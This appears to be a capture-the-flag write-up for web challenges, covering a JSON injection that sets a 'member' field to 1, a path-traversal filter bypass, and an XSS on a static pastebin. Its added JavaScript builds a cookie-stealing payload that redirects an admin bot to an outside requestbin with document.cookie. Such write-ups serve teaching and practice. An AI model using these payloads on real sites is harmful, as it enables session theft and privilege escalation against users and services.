So, for this challenge we need to set the "member" parameter in the JSON to something that is not 0, ideally 1. I don't know all the technical stuff, but I just tried to inject stuff into the JSON. Since we still need valid JSON for it to work, I first gave the name a junk value, then closed the quote, created a new member parameter and gave it the value 1, and finally created a random parameter with a junk value to make sure it was still valid JSON. Final payload (just use this as the username): hi","member":1,"hi":"hi
which gets you the flag: flag{t0ny_5uck5_47_w3b_l0l}
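As an added example (not from the original writeup), here is a toy model of the server-side JSON building that this payload exploits. The template '{"member":0,"username":"..."}' and its key order are assumptions, since the challenge's real code is not shown. What it demonstrates: the injected "member":1 lands after the template's "member":0, so a last-key-wins parser reads 1, and the trailing junk key swallows the template's closing quote and brace so the text stays valid JSON. Serialising an object instead of concatenating strings closes the hole.

```javascript
// Added example, not the challenge's code. The template is an assumption about
// how the server built its JSON; the payload is the one from the writeup.

// Vulnerable: the username is spliced into JSON text by string concatenation,
// so a double quote in the username terminates the string and lets the caller
// write arbitrary keys.
function buildProfileJsonUnsafe(username) {
  return '{"member":0,"username":"' + username + '"}';
}

// Fixed: serialise an object instead. JSON.stringify escapes the quotes, so the
// whole payload stays inside the username string.
function buildProfileJsonSafe(username) {
  return JSON.stringify({ member: 0, username: username });
}

// Models the server side that parses the JSON and reads the membership flag.
// JSON.parse keeps the LAST value of a duplicated key, which is why the injected
// "member":1 must come after the template's "member":0 to win.
function memberFlag(jsonText) {
  return JSON.parse(jsonText).member;
}

// The payload from the writeup: closes the username string, adds "member":1,
// then opens a junk key whose value absorbs the template's closing `"}`.
const PAYLOAD = 'hi","member":1,"hi":"hi';

// Demo when run directly with node.
console.log(buildProfileJsonUnsafe(PAYLOAD)); // {"member":0,"username":"hi","member":1,"hi":"hi"}
console.log('unsafe member =', memberFlag(buildProfileJsonUnsafe(PAYLOAD))); // 1
console.log('safe member   =', memberFlag(buildProfileJsonSafe(PAYLOAD)));   // 0
```

The same key-order detail explains why the payload would not work if "member" came after "username" in the template: the original "member":0 would then be the last occurrence and win.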
Flag: flag{1_c4nt_f1nd_4_g00d_p4nd4_pun}
Web
Static Static Hosting
Just pasted XSS filter bypasses until one gave an alert('xss'), then refined it to send us the cookie.
If the first character is not alphanumeric, remove it, and keep removing until an alphanumeric character is found.
If the string "../" (or basically any variant of it, URL-encoded etc.) is present, replace it with nothing, and keep replacing until none are left.
We can bypass this by giving a decoy path parameter some random value (as long as it's not an actual directory, I think it's fine), and then adding "&&path=" to supply a second path variable, which is unfiltered.
That looks kind of like base64, and if you base64-decode the part after https://static-pastebin.2020.redpwnc.tf/paste/# you'll find it decodes to the content of the pastebin. This lets us create pastebin messages easily: base64-encode the content and append it after the #.
There's also an admin bot submit form where we can submit a URL, and the admin bot will visit it.
Rak found that the XSS payload ><img src='' onerror="javascript code"> worked.
First, we can try a simple redirect: ><img src='' onerror="document.location='requestbinurl'">. I set up a requestbin for this purpose. Remember: we base64-encode the payload and append it after the # in the paste URL.
That redirect payload, as a sample, works, sending a request to our requestbin. Let's exfiltrate some information. We can use GET parameters to exfiltrate data.
This would redirect the admin to our requestbin, sending the cookies as the "thing" parameter. Base64-encoding this and submitting it as a URL, a request pops up on the requestbin with the parameter ?thing=flag=flag{54n1t1z4t10n_k1nd4_h4rd}, giving us the flag.
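As an added example (not the original writeup's code), the following builds the paste URL and the two payloads described above, and parses the exfiltrated cookie the way the requestbin side sees it. The cookie-exfiltration payload is reconstructed from the description (the redirect payload plus document.cookie in a "thing" GET parameter); the requestbin URL is an assumed placeholder.

```javascript
// Added example, not the writeup's own code. PASTE_BASE is from the page; the
// requestbin URL used in the demo is a placeholder.
const PASTE_BASE = 'https://static-pastebin.2020.redpwnc.tf/paste/#';

// The paste body travels base64-encoded in the URL fragment, so the server
// never sees it; decoding and rendering happen client-side.
function encodePaste(content) {
  return PASTE_BASE + Buffer.from(content, 'utf8').toString('base64');
}

function decodePaste(url) {
  const hash = url.indexOf('#');
  if (hash === -1) return null;
  return Buffer.from(url.slice(hash + 1), 'base64').toString('utf8');
}

// Step one from the writeup: a plain redirect to prove the bot executes us.
function redirectPayload(requestbinUrl) {
  return `><img src='' onerror="document.location='${requestbinUrl}'">`;
}

// Step two, reconstructed from the description: the same redirect, with
// document.cookie appended as the "thing" GET parameter.
function cookieExfilPayload(requestbinUrl) {
  return `><img src='' onerror="document.location='${requestbinUrl}?thing='+document.cookie">`;
}

// Requestbin side: recover the cookie from the URL the bot was sent to.
function exfiltratedCookie(requestUrl) {
  return new URL(requestUrl).searchParams.get('thing');
}

// Demo when run directly with node: this is the URL to hand to the admin bot.
const BIN = 'https://example.invalid/bin'; // placeholder, not a real requestbin
console.log(encodePaste(cookieExfilPayload(BIN)));
```

The decode helper is the check to run before submitting: if decodePaste(encodePaste(payload)) does not give back the exact payload, the bot will not render what you think it will.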